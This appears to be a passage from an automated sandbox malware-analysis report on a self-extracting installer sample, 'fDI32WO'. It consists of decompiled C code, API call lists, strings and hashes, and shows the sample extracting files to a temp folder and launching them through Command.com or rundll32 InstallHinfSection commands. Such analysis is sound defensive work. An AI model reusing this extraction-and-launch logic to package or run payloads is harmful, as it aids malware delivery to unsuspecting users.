                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00A88C42), ref: 00A83EFF
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00A88C42), ref: 00A83F1F
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00A88C42), ref: 00A83F40
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00A88C42), ref: 00A83F47
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A88C42), ref: 00A83F76
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A88C42), ref: 00A83F80
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A88C42), ref: 00A83FC2
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                              • API String ID: 1032054927-2479693719
                                                                                                                                                                                                                                              • Opcode ID: 71ce46b826c7d3cc184d3b10b7576c5be166ce8734824694d8e72cf55659f732
                                                                                                                                                                                                                                              • Instruction ID: b708288497d129a437b2bfa4da9f7f225a6af87f6091c046bcb019526f007775
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71ce46b826c7d3cc184d3b10b7576c5be166ce8734824694d8e72cf55659f732
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54B1D5729083019FDB24FF648945B6BB6F4FB84B40F14492EFA85D6190EB74CD46CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00A81AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v527;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				char _v1552;
                                                                                                                                                                                                                                              				CHAR* _v1556;
                                                                                                                                                                                                                                              				int* _v1560;
                                                                                                                                                                                                                                              				CHAR** _v1564;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t48;
                                                                                                                                                                                                                                              				CHAR* _t53;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				char* _t57;
                                                                                                                                                                                                                                              				char* _t58;
                                                                                                                                                                                                                                              				CHAR* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				signed char _t65;
                                                                                                                                                                                                                                              				intOrPtr _t76;
                                                                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                                                                              				unsigned int _t85;
                                                                                                                                                                                                                                              				CHAR* _t90;
                                                                                                                                                                                                                                              				CHAR* _t92;
                                                                                                                                                                                                                                              				char _t105;
                                                                                                                                                                                                                                              				char _t106;
                                                                                                                                                                                                                                              				CHAR** _t111;
                                                                                                                                                                                                                                              				CHAR* _t115;
                                                                                                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                                                                              				CHAR* _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				void* _t138;
                                                                                                                                                                                                                                              				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xa88004; // 0xd891196d
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00A81680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00A81A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00A81781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
					E00A8658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00A81680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00A866C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00A866C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00A81680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00A81781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00A816B3( &_v1552, 0x400, " ");
										E00A816B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00A82AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00A8171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00A81A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00A81A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
                                                                                                                                                                                                                                              									E00A844B9(0, _t140);
                                                                                                                                                                                                                                              									_t62 = 0;
                                                                                                                                                                                                                                              									goto L54;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t155 = _v1556;
                                                                                                                                                                                                                                              									_t92 = _t155;
                                                                                                                                                                                                                                              									if( *_t155 == 0) {
                                                                                                                                                                                                                                              										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									 *0xa89120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                              									 *_v1560 = 1;
                                                                                                                                                                                                                                              									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa81140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                              										 *0xa89a34 =  *0xa89a34 & 0xfffffffb;
                                                                                                                                                                                                                                              										if( *0xa89a40 != 0) {
                                                                                                                                                                                                                                              											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t108 = "setupx.dll";
                                                                                                                                                                                                                                              											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										if( *_t155 == 0) {
                                                                                                                                                                                                                                              											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_push( &_v268);
                                                                                                                                                                                                                                              										_push(_t155);
                                                                                                                                                                                                                                              										E00A8171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										 *0xa89a34 =  *0xa89a34 | 0x00000004;
                                                                                                                                                                                                                                              										if( *_t155 == 0) {
                                                                                                                                                                                                                                              											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										E00A81680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                              										_t140 = 0x200;
                                                                                                                                                                                                                                              										E00A81680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									L53:
                                                                                                                                                                                                                                              									_t62 = 1;
                                                                                                                                                                                                                                              									 *_v1564 = _t156;
                                                                                                                                                                                                                                              									L54:
                                                                                                                                                                                                                                              									_pop(_t152);
                                                                                                                                                                                                                                              									return E00A86CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}














































                                                                                                                                                                                                                                              0x00a81da8
                                                                                                                                                                                                                                              0x00a81dac
                                                                                                                                                                                                                                              0x00a81dae
                                                                                                                                                                                                                                              0x00a81db4
                                                                                                                                                                                                                                              0x00a81db7
                                                                                                                                                                                                                                              0x00a81db7
                                                                                                                                                                                                                                              0x00a81db9
                                                                                                                                                                                                                                              0x00a81dba
                                                                                                                                                                                                                                              0x00a81dbe
                                                                                                                                                                                                                                              0x00a81dc3
                                                                                                                                                                                                                                              0x00a81dce
                                                                                                                                                                                                                                              0x00a81dd2
                                                                                                                                                                                                                                              0x00a81deb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81df0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81dd2
                                                                                                                                                                                                                                              0x00a81bf7
                                                                                                                                                                                                                                              0x00a81bfe
                                                                                                                                                                                                                                              0x00a81c07
                                                                                                                                                                                                                                              0x00a81d55
                                                                                                                                                                                                                                              0x00a81d5a
                                                                                                                                                                                                                                              0x00a81d5b
                                                                                                                                                                                                                                              0x00a81d5d
                                                                                                                                                                                                                                              0x00a81d5e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81c1b
                                                                                                                                                                                                                                              0x00a81c1b
                                                                                                                                                                                                                                              0x00a81c20
                                                                                                                                                                                                                                              0x00a81c2c
                                                                                                                                                                                                                                              0x00a81c33
                                                                                                                                                                                                                                              0x00a81c38
                                                                                                                                                                                                                                              0x00a81c3a
                                                                                                                                                                                                                                              0x00a81c3a
                                                                                                                                                                                                                                              0x00a81c40
                                                                                                                                                                                                                                              0x00a81c4b
                                                                                                                                                                                                                                              0x00a81c4b
                                                                                                                                                                                                                                              0x00a81c5d
                                                                                                                                                                                                                                              0x00a81c61
                                                                                                                                                                                                                                              0x00a81dd4
                                                                                                                                                                                                                                              0x00a81dd4
                                                                                                                                                                                                                                              0x00a81dd6
                                                                                                                                                                                                                                              0x00a81ddb
                                                                                                                                                                                                                                              0x00a81ddc
                                                                                                                                                                                                                                              0x00a81dde
                                                                                                                                                                                                                                              0x00a81d64
                                                                                                                                                                                                                                              0x00a81d64
                                                                                                                                                                                                                                              0x00a81d67
                                                                                                                                                                                                                                              0x00a81d6c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81c67
                                                                                                                                                                                                                                              0x00a81c67
                                                                                                                                                                                                                                              0x00a81c6d
                                                                                                                                                                                                                                              0x00a81c72
                                                                                                                                                                                                                                              0x00a81c74
                                                                                                                                                                                                                                              0x00a81c74
                                                                                                                                                                                                                                              0x00a81c8e
                                                                                                                                                                                                                                              0x00a81c99
                                                                                                                                                                                                                                              0x00a81cc0
                                                                                                                                                                                                                                              0x00a81cf8
                                                                                                                                                                                                                                              0x00a81d07
                                                                                                                                                                                                                                              0x00a81d23
                                                                                                                                                                                                                                              0x00a81d09
                                                                                                                                                                                                                                              0x00a81d14
                                                                                                                                                                                                                                              0x00a81d1b
                                                                                                                                                                                                                                              0x00a81d1b
                                                                                                                                                                                                                                              0x00a81d2b
                                                                                                                                                                                                                                              0x00a81d2d
                                                                                                                                                                                                                                              0x00a81d2d
                                                                                                                                                                                                                                              0x00a81d38
                                                                                                                                                                                                                                              0x00a81d39
                                                                                                                                                                                                                                              0x00a81d46
                                                                                                                                                                                                                                              0x00a81cc2
                                                                                                                                                                                                                                              0x00a81cc2
                                                                                                                                                                                                                                              0x00a81ccc
                                                                                                                                                                                                                                              0x00a81cce
                                                                                                                                                                                                                                              0x00a81cce
                                                                                                                                                                                                                                              0x00a81cdb
                                                                                                                                                                                                                                              0x00a81ce6
                                                                                                                                                                                                                                              0x00a81cee
                                                                                                                                                                                                                                              0x00a81cee
                                                                                                                                                                                                                                              0x00a81e89
                                                                                                                                                                                                                                              0x00a81e91
                                                                                                                                                                                                                                              0x00a81e92
                                                                                                                                                                                                                                              0x00a81e94
                                                                                                                                                                                                                                              0x00a81e97
                                                                                                                                                                                                                                              0x00a81ea4
                                                                                                                                                                                                                                              0x00a81ea4
                                                                                                                                                                                                                                              0x00a81c61
                                                                                                                                                                                                                                              0x00a81c07
                                                                                                                                                                                                                                              0x00a81bd3
                                                                                                                                                                                                                                              0x00a81b7b

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A81BE7
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A81BFE
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A81C57
                                                                                                                                                                                                                                              • GetPrivateProfileIntA.KERNEL32 ref: 00A81C88
                                                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A81140,00000000,00000008,?), ref: 00A81CB8
                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00A81D1B
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                              • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

Control-flow Graph

[Figure: control-flow graph; legend: Executed / Not Executed]
                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00A82F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v272;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                                                                                              				intOrPtr* _t26;
                                                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              				int _t47;
                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                              				void* _t59;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t43 = __edx;
                                                                                                                                                                                                                                              				_t9 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                              				if( *0xa88a38 != 0) {
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					_t11 = E00A85164(_t52);
                                                                                                                                                                                                                                              					_t53 = _t11;
                                                                                                                                                                                                                                              					if(_t11 == 0) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						_t12 = 0;
                                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                                              						return E00A86CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t14 = E00A855A0(_t53); // executed
                                                                                                                                                                                                                                              					if(_t14 == 0) {
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t45 = 0x105;
                                                                                                                                                                                                                                              						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                              						_t43 = 0x105;
                                                                                                                                                                                                                                              						_t40 =  &_v272;
                                                                                                                                                                                                                                              						E00A8658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                              						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                              						_t44 = 0;
                                                                                                                                                                                                                                              						if(_t36 != 0) {
                                                                                                                                                                                                                                              							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                              							_v276 = _t31;
                                                                                                                                                                                                                                              							if(_t31 != 0) {
                                                                                                                                                                                                                                              								_t45 = _t47;
                                                                                                                                                                                                                                              								_t40 = _t31;
                                                                                                                                                                                                                                              								 *0xa8a288("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                                                              								_v276();
                                                                                                                                                                                                                                              								if(_t47 != _t47) {
                                                                                                                                                                                                                                              									_t40 = 4;
                                                                                                                                                                                                                                              									asm("int 0x29");
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						FreeLibrary(_t36);
                                                                                                                                                                                                                                              						_t58 =  *0xa88a24 - _t44; // 0x0
                                                                                                                                                                                                                                              						if(_t58 != 0) {
                                                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                                                              							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                                                              							if(_t21 != 0) {
                                                                                                                                                                                                                                              								__eflags =  *0xa88a2c - _t44; // 0x0
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									L20:
                                                                                                                                                                                                                                              									__eflags =  *0xa88d48 & 0x000000c0;
                                                                                                                                                                                                                                              									if(( *0xa88d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                              										_t41 =  *0xa89a40; // 0x3, executed
                                                                                                                                                                                                                                              										_t26 = E00A8256D(_t41); // executed
                                                                                                                                                                                                                                              										_t44 = _t26;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t22 =  *0xa88a24; // 0x0
                                                                                                                                                                                                                                              									 *0xa89a44 = _t44;
                                                                                                                                                                                                                                              									__eflags = _t22;
                                                                                                                                                                                                                                              									if(_t22 != 0) {
                                                                                                                                                                                                                                              										L26:
                                                                                                                                                                                                                                              										__eflags =  *0xa88a38;
                                                                                                                                                                                                                                              										if( *0xa88a38 == 0) {
                                                                                                                                                                                                                                              											__eflags = _t22;
                                                                                                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                                                                                                              												E00A84169(__eflags);
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t12 = 1;
                                                                                                                                                                                                                                              										goto L17;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										__eflags =  *0xa89a30 - _t22; // 0x0
                                                                                                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                                                                                                              											goto L26;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t25 = E00A83BA2(); // executed
                                                                                                                                                                                                                                              										__eflags = _t25;
                                                                                                                                                                                                                                              										if(_t25 == 0) {
                                                                                                                                                                                                                                              											goto L16;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t22 =  *0xa88a24; // 0x0
                                                                                                                                                                                                                                              										goto L26;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t27 = E00A83B26(_t40, _t44);
                                                                                                                                                                                                                                              								__eflags = _t27;
                                                                                                                                                                                                                                              								if(_t27 == 0) {
                                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t43 = 0x4bc;
                                                                                                                                                                                                                                              							E00A844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                              							 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t59 =  *0xa89a30 - _t44; // 0x0
                                                                                                                                                                                                                                              						if(_t59 != 0) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = E00A8621E(); // executed
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t49 =  *0xa88a24;
                                                                                                                                                                                                                                              				if( *0xa88a24 != 0) {
                                                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                                                              					_t34 = E00A83A3F(_t51);
                                                                                                                                                                                                                                              					_t52 = _t34;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(E00A851E5(_t49) == 0) {
                                                                                                                                                                                                                                              					goto L16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t51 =  *0xa88a38;
                                                                                                                                                                                                                                              				if( *0xa88a38 != 0) {
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L4;
                                                                                                                                                                                                                                              			}




























                                                                                                                                                                                                                                              0x00a8303c
                                                                                                                                                                                                                                              0x00a83006
                                                                                                                                                                                                                                              0x00a8300c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8300e
                                                                                                                                                                                                                                              0x00a83015
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83015
                                                                                                                                                                                                                                              0x00a82f80
                                                                                                                                                                                                                                              0x00a82f3f
                                                                                                                                                                                                                                              0x00a82f46
                                                                                                                                                                                                                                              0x00a82f5f
                                                                                                                                                                                                                                              0x00a82f5f
                                                                                                                                                                                                                                              0x00a82f64
                                                                                                                                                                                                                                              0x00a82f66
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82f66
                                                                                                                                                                                                                                              0x00a82f4f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82f55
                                                                                                                                                                                                                                              0x00a82f5d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00A82F93
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A82FB2
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A82FC6
                                                                                                                                                                                                                                              • DecryptFileA.ADVAPI32 ref: 00A82FE6
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A82FF8
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A8301C
                                                                                                                                                                                                                                                • Part of subcall function 00A851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A82F4D,?,00000002,00000000), ref: 00A85201
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                              • API String ID: 2126469477-2099937843
                                                                                                                                                                                                                                              • Opcode ID: 15d8e1b523c57d9de81e905b18a3ca79db289d02cdf4136756da210fa9ace652
                                                                                                                                                                                                                                              • Instruction ID: d95ee68f1880ceac49d72871174c22768bce405801635c700b81df1e4f9c199d
